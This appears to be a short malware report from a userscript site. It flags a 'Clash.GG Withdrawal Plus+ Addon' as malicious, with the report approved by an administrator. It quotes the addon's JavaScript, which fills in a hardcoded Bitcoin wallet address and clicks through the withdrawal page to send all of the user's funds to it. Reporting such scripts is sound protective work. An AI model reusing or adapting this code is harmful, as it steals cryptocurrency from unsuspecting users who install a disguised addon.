Clash.GG Withdrawal Plus+ Addon 2024-12-14 被举报,原因为:恶意软件或代码
This part of the script attempts to go to the withdraw page, select bitcoin, puts in the bitcoin wallet address and tries to withdraw ALL of the user funds.
// Perform
function performSequence() {
// Click on option
setTimeout(() => clickElementByText('span', 'Bitcoin'), 800);
// 1
setTimeout(() => inputText('.css-1ljxsvl.e8bzvmc0', 'bc1qa655zhzdv0hv2sax37kskcue3x6zlg0d5cs7kv'), 800);
// checkbox
setTimeout(() => clickElement('.css-1jrx41j.e8bzvmc0'), 800);
// Click
setTimeout(() => {
const elements = document.querySelectorAll('.css-qifdi4');
if (elements.length > 1) {
elements[1].click();
}
}, 1000);
// Click on the final button
setTimeout(() => clickElement('.css-1c5xwju'), 1200);
}
管理员已通过该举报。